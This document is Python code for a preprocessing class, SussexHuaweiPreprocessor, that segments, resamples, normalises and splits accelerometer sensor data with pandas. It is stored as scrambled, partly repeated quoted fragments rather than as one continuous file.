\"\"\"", "classical approach via TS Fresh )[:-2] #Valid data_valid = self.de_segment_data(data_valid_segments, selected_columns) data_valid, mean_valid,", "classical approach via TS Fresh )[:-2] #Test data_test = self.de_segment_data(data_test_segments, selected_columns) data_test, mean_test,", "if not isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance(reduced_column_name, str): raise", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) data[column] = pandas.to_datetime(data[column], unit=unit) return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc())", "pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params') acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] freq = config['pre_proc_resample_freq']", "return data @overrides def training_split_process(self, data, config, labels): \"\"\" Apply all preprocessing steps", "print('Convert time unit, remove nans') data = self.convert_unix_to_datetime(data, column='time', unit='ms') data = self.remove_nans(data,", "in range(len(data_train_segments)): data_train_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_train_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for", "min_length_subsegements.append(segment) if not aggregate: for segment in min_length_subsegements: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return min_length_subsegements", "better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing, outlier removal') #Train selected_columns", "== 'semantic': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'labels': # 1. Select all data", ":param replacement_value: any type, used as value if replacment_mode is 'default_val' :return: pandas.DataFrame", "Select all data with desired label value data_segments = [] for target_label in", "os._exit(2) @overrides def remove_unwanted_labels(self, data, unwanted_labels, replacement_mode): \"\"\" Remove rows that have an", "TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'custom_function': if encoding_function is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) for column", "isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data, 'unwanted_labels', unwanted_labels) raise", "if mode == 'fixed_interval': segment_length = args[0] aggregate = args[1] exact_length = args[2]", "mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(mode, str)", "data: :return: \"\"\" try: if data is None or labels is None: raise", "in range(len(data_segments)): if data is None: data = data_segments[ind][selected_columns] else: data = pandas.concat([data,", "mode, reduced_column_name = 'reduced', columns = None): \"\"\" Apply a dimensionality reduction technique", "(TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def project_accelerometer_to_global_coordinates(self, data,", "a data set. :param data: :param mode: :param reduced_column_name: :param columns: :return: \"\"\"", "str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data, 'unwanted_labels', unwanted_labels) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value)", "= PCA(n_components=1) pca.fit(data[columns]) reduced = pandas.DataFrame((numpy.dot(pca.components_, data[columns].T).T)) reduced = reduced.rename(columns={0:reduced_column_name}) reduced = reduced.reset_index(drop=True)", "= (data[columns] - data[columns].mean()) / data[columns].std() else: mean = data.mean() std = data.std()", "is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(unwanted_labels, list) or", "segment.reset_index() segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) segment = self.resample_quantitative_data(segment, freq=\"{}s\".format(segment_length), mode = 'mean') if segments_combined", "and std is None: if columns is not None: mean = data[columns].mean() std", "mode == 'pca': # Source: # https://stackoverflow.com/questions/23282130/principal-components-analysis-using-pandas-dataframe # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html # https://en.wikipedia.org/wiki/Principal_component_analysis", "old_index = data.index data = pandas.concat([data, reduced], axis=1) data = data.rename(columns={0: reduced_column_name}) data", "car_valid_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: data_valid_segments.append(road_segment)", "range(len(data_train_segments)): data_train_segments[ind] = data_train_segments[ind].set_index('time') data_train_segments[ind] = self.resample_quantitative_data(data_train_segments[ind], freq=freq) # 8000 1.25 Hz #Test", ") #Valid for ind in range(len(data_valid_segments)): data_valid_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_valid_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works", "TS Fresh )[:-2] #Valid data_valid = self.de_segment_data(data_valid_segments, selected_columns) data_valid, mean_valid, std_valid = self.znormalize_quantitative_data(data_valid,", "# https://stackoverflow.com/questions/42698421/pandas-to-datetime-from-milliseconds-produces-incorrect-datetime try: if data is None or column is None or unit", "columns, list): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'custom_function': if encoding_function is None: raise", "is not None: segments_combined = segments_combined.reset_index() segments_combined.index = pandas.DatetimeIndex( segments_combined.index.astype('datetime64[1s]')) segments_aggregated.append(segments_combined) return segments_aggregated", "stamps to date time. :param data: :param column: :param unit: :return: \"\"\" #", "= data_segments[ind][selected_columns] else: data = pandas.concat([data, data_segments[ind][selected_columns]], axis=axis) data = data.reset_index(drop=True) return data", "better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Test for ind in range(len(data_test_segments)):", "https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html # https://en.wikipedia.org/wiki/Principal_component_analysis pca = PCA(n_components=1) pca.fit(data[columns]) reduced = pandas.DataFrame((numpy.dot(pca.components_, data[columns].T).T))", "for inference. :param data: pandas.DataFrame :param params: List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\"", "below calculation # https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation # https://en.wikipedia.org/wiki/Homogeneous_coordinates # #https://stackoverflow.com/questions/2422750/in-opengl-vertex-shaders-what-is-w-and-why-do-i-divide-by-it for ind, column in enumerate(target_columns):", "https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.resample.html # https://jakevdp.github.io/PythonDataScienceHandbook/03.11-working-with-time-series.html try: if data is None or freq is None: raise", "https://stackoverflow.com/questions/42698421/pandas-to-datetime-from-milliseconds-produces-incorrect-datetime try: if data is None or column is None or unit is", "or too short after splitting min_length_subsegements = [] for segment in segments: if", "removal') #Train selected_columns = ['acceleration_abs', 'road_label', 'id'] # 'acceleration_abs' data_train = self.de_segment_data(data_train_segments, selected_columns)", "or a threshold value. :param data: :param replacement_mode: :param columns: :param quantile: :param", "TS Fresh )[:-2] data_train = data_train.loc[:, ~data_train.columns.duplicated()] data_test = data_test.loc[:, ~data_test.columns.duplicated()] data_valid =", "self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def resample_quantitative_data(self, data, freq, mode =", "unwanted label. :param data: :param unwanted_labels: :param replacement_mode: :return: \"\"\" try: if data", "Fresh )[:-2] #Valid data_valid = self.de_segment_data(data_valid_segments, selected_columns) data_valid, mean_valid, std_valid = self.znormalize_quantitative_data(data_valid, selected_columns[:-2],", "TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) # Source for theory behind below calculation # https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation # https://en.wikipedia.org/wiki/Homogeneous_coordinates #", "#data_train = self.remove_nans(data_train, replacement_mode='del_row') #data_test = self.remove_nans(data_test, replacement_mode='del_row') #data_valid = self.remove_nans(data_valid, replacement_mode='del_row') #print(data_train.head(100))", "None or replacement_mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)", "training_split_process(self, data, config, labels): \"\"\" Apply all preprocessing steps necessary for training. :param", "in segments: if segment.shape[0] == segment_length: min_length_subsegements.append(segment) if not aggregate: for segment in", "data_train.loc[:, ~data_train.columns.duplicated()] data_test = data_test.loc[:, ~data_test.columns.duplicated()] data_valid = data_valid.loc[:, ~data_valid.columns.duplicated()] #print('Rolling mean smoothing')", "freq=freq) #Valid for ind in range(len(data_valid_segments)): data_valid_segments[ind] = data_valid_segments[ind].set_index('time') data_valid_segments[ind] = self.resample_quantitative_data(data_valid_segments[ind], freq=freq)", "data: :param replacement_mode: :param columns: :param quantile: :param threshold: :return: \"\"\" try: if", "'replacement_val': return ReplacementValReplacementStrategy().replace(data, 'NaN', replacement_vals=replacement_value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1)", "non-subsequent indices # Source for next 3 lines after comment: # https://stackoverflow.com/questions/56257329/how-to-split-a-dataframe-based-on-consecutive-index non_sequence", "= non_sequence.cumsum().values selected_data_segments = [group for _, group in selected_data.groupby(grouper)] for segment in", "meta_data['mean_train'] std_train = meta_data['std_train'] print('Convert time unit, remove nans') data = self.convert_unix_to_datetime(data, column='time',", "data_test_valid.head(test_len) data_valid = data_test_valid.tail(valid_len) print('Segment by labels') #Segment Train car_train_segments = self.segment_data(data_train, mode='labels',", "if segments_combined is None: segments_combined = segment else: segments_combined = pandas.concat([segments_combined, segment], axis=0)", "TypeError(self.messages.PROVIDED_FRAME_DOESNT_MATCH_DATA.value) return pandas.concat((labels, data), axis=1) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception:", "std else: data = (data - mean) / std else: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) return", "None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'semantic':", "SussexHuaweiPreprocessor(Preprocessor): def __init__(self): super().__init__() @overrides def segment_data(self, data, mode, label_column=None, args=None): \"\"\" Segements", "self.logger.error(traceback.format_exc()) os._exit(2) @overrides def label_data(self, labels, data): \"\"\" Combines labels vector and data", "0.0 substract 0.5 return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception:", "!= 1 grouper = non_sequence.cumsum().values selected_data_segments = [group for _, group in selected_data.groupby(grouper)]", "os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def inference_split_process(self, data, config, meta_data): \"\"\" Apply", "Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_outliers_from_quantitative_data(self, data, replacement_mode, columns, quantile = None, threshold", "std except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def", "== 'manhatten': reduced = data[columns].sum(axis=1).apply(numpy.abs, axis=1) old_index = data.index data = pandas.concat([data, reduced],", "function. :param data: :param mode: :param columns: :param encoding_function: :return: \"\"\" try: if", "str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'mean' or mode is None: return data.resample(freq).mean()", "data[column] = pandas.to_datetime(data[column], unit=unit) return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except", "data, config, labels): \"\"\" Apply all preprocessing steps necessary for training. :param data:", "split(data, segment_length) if not exact_length: for segment in segments: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return", "'time', unit = 'ms') data = self.label_data(data, labels) data = self.remove_nans(data, replacement_mode='del_row') print('Train,", "= data.set_index(old_index) return data if mode == 'manhatten': reduced = data[columns].sum(axis=1).apply(numpy.abs, axis=1) old_index", "NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def znormalize_quantitative_data(self, data, columns", "is None or unit is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or", "@overrides def remove_unwanted_labels(self, data, unwanted_labels, replacement_mode): \"\"\" Remove rows that have an unwanted", "None or target_columns is None or mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not", "a label column, semantic segementation of a fixed interval. :param data: :param mode:", "de_segment_data(self, data_segments, selected_columns=None, axis = 0): \"\"\" Desegements as time series. :param data_segments:", "comment: # https://stackoverflow.com/questions/56257329/how-to-split-a-dataframe-based-on-consecutive-index non_sequence = pandas.Series(selected_data.index).diff() != 1 grouper = non_sequence.cumsum().values selected_data_segments =", "than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Valid for ind in range(len(data_valid_segments)): data_valid_segments[ind]", "= data_train.loc[:, ~data_train.columns.duplicated()] data_test = data_test.loc[:, ~data_test.columns.duplicated()] data_valid = data_valid.loc[:, ~data_valid.columns.duplicated()] #print('Rolling mean", "columns: :param mean: :param std: :return: \"\"\" try: if data is None: raise", "None or columns is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not", "mode == 'fixed_interval': segment_length = args[0] aggregate = args[1] exact_length = args[2] segments_aggregated", "lines of code after comment: # https://nextjournal.com/schmudde/how-to-remove-outliers-in-data for column in columns: not_outliers =", "def reduce_quantitativ_data_dimensionality(self, data, mode, reduced_column_name = 'reduced', columns = None): \"\"\" Apply a", "args=selected_road_labels ) for road_segment in road_segments: data_test_segments.append(road_segment) #Segment Valid car_valid_segments = self.segment_data(data_valid, mode='labels',", "(TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def de_segment_data(self, data_segments,", ":param data: :param freq: :param mode: :return: \"\"\" # Source: # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.resample.html #", "is None: segments_combined = segment else: segments_combined = pandas.concat([segments_combined, segment], axis=0) if segments_combined", "label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: data_valid_segments.append(road_segment) print('Resample') #Train for ind in", "selected_columns, mean_train, std_train) data = self.remove_outliers_from_quantitative_data( data, replacement_mode='quantile', columns=selected_columns, quantile=0.99 # current run", "data = data.set_index(old_index) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1)", "pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params') acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] freq =", "= None): \"\"\" Apply z-normalization to a data set. :param data: :param columns:", "config['data_set_column_names'][1:][2]] freq = config['pre_proc_resample_freq'] # '1000ms' mean_train = meta_data['mean_train'] std_train = meta_data['std_train'] print('Convert", "string, 'mean', 'replacement_val', 'delet_row' :param replacement_value: any type, used as value if replacment_mode", "# https://thispointer.com/pandas-apply-apply-a-function-to-each-row-column-in-dataframe/ # https://www.google.com/search?client=ubuntu&channel=fs&q=euclidean+norm&ie=utf-8&oe=utf-8 # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html reduced = data[columns].apply(numpy.square, axis=1)[columns].sum(axis=1).apply(numpy.sqrt) #**(1/2)", "- mean) / std else: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) return data, mean, std except (TypeError,", "Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def znormalize_quantitative_data(self, data, columns = None, mean = None,", "Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def re_represent_data(self, current_representation, target_representation, data): \"\"\" Change representation of", ":param replacement_mode: :return: \"\"\" try: if data is None or replacement_mode is None", "len(columns) < 1: raise ValueError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if replacement_mode == 'quantile': # Source for next", "replacement_mode is None or unwanted_labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame)", "mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: data_test_segments.append(road_segment) #Segment Valid car_valid_segments =", "freq=freq) # 8000 1.25 Hz #Test for ind in range(len(data_test_segments)): data_test_segments[ind] = data_test_segments[ind].set_index('time')", "= pandas.to_datetime(data[column], unit=unit) return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception:", "data is None or column is None or unit is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)", "columns, encoding_function): \"\"\" Encode categorical features using an encoding function. :param data: :param", "is None or mode is None or columns is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if", "columns: data[column] = encoding_function(data[column]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc())", ":param mode: :param label_column: :param args: :return: \"\"\" try: if data is None", "pandas.DataFrame)): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if (len(labels) != len(data)): raise TypeError(self.messages.PROVIDED_FRAME_DOESNT_MATCH_DATA.value) return pandas.concat((labels, data), axis=1)", "= self.segment_data(data_valid, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_valid_segments = [] for car_segment in car_valid_segments: road_segments", "quantile=0.99 # current run @0.95 for classical approach via TS Fresh )[:-1] return", "reduction') #Train for ind in range(len(data_train_segments)): data_train_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_train_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works", "data[column][not_outliers] index_names = data[~not_outliers].index data.drop(index_names, inplace=True) old_index = data.index data = data.reset_index(drop=False) data", "- data.min()) / (data.max() - data.min()) # to center around 0.0 substract 0.5", "config['pre_proc_resample_freq'] # '1000ms' mean_train = meta_data['mean_train'] std_train = meta_data['std_train'] print('Convert time unit, remove", "Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def resample_quantitative_data(self, data, freq, mode = None): \"\"\" Resamples", "= int(data_len * valid_sz) data_train, data_test_valid = data.head(train_len), data.tail(test_len+valid_len) data_test = data_test_valid.head(test_len) data_valid", "None or labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not (isinstance(data, pandas.DataFrame) and isinstance(labels,", "@overrides def encode_categorical_features(self, data, mode, columns, encoding_function): \"\"\" Encode categorical features using an", "data, mean, std = self.znormalize_quantitative_data(data, selected_columns, mean_train, std_train) data = self.remove_outliers_from_quantitative_data( data, replacement_mode='quantile',", "len(target_columns)+1 != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) # Source for theory behind below calculation #", "# 1. Select all data with desired label value data_segments = [] for", "after comment: # https://nextjournal.com/schmudde/how-to-remove-outliers-in-data for column in columns: not_outliers = data[column].between( data[column].quantile(1.0 -", "'delet_row' :param replacement_value: any type, used as value if replacment_mode is 'default_val' :return:", ":param data: :param columns: :return: \"\"\" try: if data is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)", "= self.resample_quantitative_data(segment, freq=\"{}s\".format(segment_length), mode = 'mean') if segments_combined is None: segments_combined = segment", "config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] selected_coarse_labels = config['pre_proc_movement_type_label'] #[5] selected_road_labels = config['pre_proc_road_type_label'] #[1, 3] freq =", "= self.remove_nans(data, replacement_mode='del_row') data.set_index(data['time'], drop=True, inplace=True) print('Resample') data = self.resample_quantitative_data(data, freq=freq) # 8000", "None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not", "from pipeline.feature_engineering.preprocessing.replacement_strategies.mean_replacement_strategy import MeanReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.del_row_replacement_strategy import DelRowReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.replacement_val_replacement_strategy import ReplacementValReplacementStrategy from", "None: data[columns] = (data[columns] - mean) / std else: data = (data -", ":param mode: :param columns: :param encoding_function: :return: \"\"\" try: if data is None", "@overrides def project_accelerometer_to_global_coordinates(self, data, target_columns, mode, args=None): \"\"\" Project accelerometer data from local", "data: :param target_columns: :param mode: :param args: :return: \"\"\" try: if data is", "quantile = None, threshold = None): \"\"\" Removes outlieres either based on quantile", "try: if data is None or mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not", "def resample_quantitative_data(self, data, freq, mode = None): \"\"\" Resamples quantitative data. :param data:", "or not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data, 'unwanted_labels',", "if len(columns) < 1: raise ValueError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if replacement_mode == 'quantile': # Source for", "data.mean()) / data.std() elif mean is not None and std is not None:", "works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Valid for ind in", "self.logger.error(traceback.format_exc()) os._exit(2) @overrides def convert_unix_to_datetime(self, data, column, unit): \"\"\" Converts unix time stamps", "os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_outliers_from_quantitative_data(self, data, replacement_mode, columns, quantile =", "TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(freq, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode", "if not aggregate: for segment in min_length_subsegements: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return min_length_subsegements #3.", "mode == 'mean' or mode is None: return data.resample(freq).mean() if mode == 'sum':", "Test, Validation split') data_len = data.shape[0] test_len = int(data_len * test_sz) train_len =", "data_segments[ind][selected_columns] else: data = pandas.concat([data, data_segments[ind][selected_columns]], axis=axis) data = data.reset_index(drop=True) return data except", "in enumerate(target_columns): data[column] = data[column] * (data[args[ind]] / data[args[3]]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value)", "mode == 'labels': # 1. Select all data with desired label value data_segments", "None: return data.resample(freq).mean() if mode == 'sum': return data.resample(freq).sum() except (TypeError, NotImplementedError, ValueError):", "TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(column, str) or not isinstance(unit, str):", "== 'sum': return data.resample(freq).sum() except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc())", "None: data[columns]=(data[columns]-data[columns].min())/(data[columns].max()-data[columns].min()) # to center around 0.0 substract 0.5 else: data = (data", "or not isinstance(target_columns, list): raise TypeError(type(data)) if mode == 'mean_estimate_gravity': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if", "split = lambda df, chunk_size : numpy.array_split(df, len(df) // chunk_size + 1, axis=0)", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data, 'unwanted_labels', unwanted_labels) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except", "data if mode == 'orientation': if len(target_columns)+1 != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) # Source", "https://www.google.com/search?client=ubuntu&channel=fs&q=euclidean+norm&ie=utf-8&oe=utf-8 # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html reduced = data[columns].apply(numpy.square, axis=1)[columns].sum(axis=1).apply(numpy.sqrt) #**(1/2) alternative old_index =", "acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] freq = config['pre_proc_resample_freq'] # '1000ms' mean_train = meta_data['mean_train']", "mean = data[columns].mean() std = data[columns].std() data[columns] = (data[columns] - data[columns].mean()) / data[columns].std()", "not None: if columns is not None: data[columns] = (data[columns] - mean) /", "\"\"\" Change representation of a data set. :param current_representation: :param target_representation: :param data:", "return ReplacementValReplacementStrategy().replace(data, 'NaN', replacement_vals=replacement_value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except", "data_test_segments[ind] = data_test_segments[ind].set_index('time') data_test_segments[ind] = self.resample_quantitative_data(data_test_segments[ind], freq=freq) #Valid for ind in range(len(data_valid_segments)): data_valid_segments[ind]", "Source: # https://stackoverflow.com/questions/19231871/convert-unix-time-to-readable-date-in-pandas-dataframe # https://stackoverflow.com/questions/42698421/pandas-to-datetime-from-milliseconds-produces-incorrect-datetime try: if data is None or column is", "# Source for next 7 lines of code after comment: # https://nextjournal.com/schmudde/how-to-remove-outliers-in-data for", "to a data set. :param data: :param mode: :param reduced_column_name: :param columns: :return:", "unit: :return: \"\"\" # Source: # https://stackoverflow.com/questions/19231871/convert-unix-time-to-readable-date-in-pandas-dataframe # https://stackoverflow.com/questions/42698421/pandas-to-datetime-from-milliseconds-produces-incorrect-datetime try: if data is", "columns=selected_columns, quantile=0.99 # current run @0.95 for classical approach via TS Fresh )[:-1]", "return data, mean, std except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc())", "axis=1) old_index = data.index data = pandas.concat([data, reduced], axis=1) data = data.rename(columns={0: reduced_column_name})", "#2. Segment data segments = split(data, segment_length) if not exact_length: for segment in", "labels vector and data matrix. :param labels: :param data: :return: \"\"\" try: if", "is None or unwanted_labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or", "if data is None or replacement_mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data,", "columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Test for ind in range(len(data_test_segments)): data_test_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_test_segments[ind], mode=config['feature_eng_dim_reduction_type'],", "TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) data[column] = pandas.to_datetime(data[column], unit=unit) return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1)", "test_len = int(data_len * test_sz) train_len = int(data_len * train_sz) valid_len = int(data_len", "ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def project_accelerometer_to_global_coordinates(self, data, target_columns, mode,", "mean smoothing') #data_train['acceleration_abs'] = data_train['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #TODO make configureable #data_test['acceleration_abs'] = data_test['acceleration_abs'].rolling(5,", "@overrides def de_segment_data(self, data_segments, selected_columns=None, axis = 0): \"\"\" Desegements as time series.", "isinstance(target_columns, list): raise TypeError(type(data)) if mode == 'mean_estimate_gravity': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode ==", "desired label value data_segments = [] for target_label in args: selected_data = data[data[label_column]", "in road_segments: data_test_segments.append(road_segment) #Segment Valid car_valid_segments = self.segment_data(data_valid, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_valid_segments =", "or mode is None: return data.resample(freq).mean() if mode == 'sum': return data.resample(freq).sum() except", "quantile=0.99 # current run @0.95 for classical approach via TS Fresh )[:-2] #Valid", "min_periods=1, win_type='gaussian').sum(std=3) #data_train = self.remove_nans(data_train, replacement_mode='del_row') #data_test = self.remove_nans(data_test, replacement_mode='del_row') #data_valid = self.remove_nans(data_valid,", "data[~not_outliers].index data.drop(index_names, inplace=True) old_index = data.index data = data.reset_index(drop=False) data = data.set_index(old_index) return", "= self.remove_nans(data_train, replacement_mode='del_row') #data_test = self.remove_nans(data_test, replacement_mode='del_row') #data_valid = self.remove_nans(data_valid, replacement_mode='del_row') #print(data_train.head(100)) return", "mean) / std else: data = (data - mean) / std else: raise", "data: :param mode: :param columns: :param encoding_function: :return: \"\"\" try: if data is", "None: if columns is not None: mean = data[columns].mean() std = data[columns].std() data[columns]", "data=data, mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing,", ":param target_representation: :param data: :return: \"\"\" raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) @overrides def reduce_quantitativ_data_dimensionality(self, data, mode,", "car_segment in car_train_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in", "segment], axis=0) if segments_combined is not None: segments_combined = segments_combined.reset_index() segments_combined.index = pandas.DatetimeIndex(", "None, threshold = None): \"\"\" Removes outlieres either based on quantile or a", "in args: selected_data = data[data[label_column] == target_label] # 2. Split by non-subsequent indices", "# https://jakevdp.github.io/PythonDataScienceHandbook/03.11-working-with-time-series.html try: if data is None or freq is None: raise 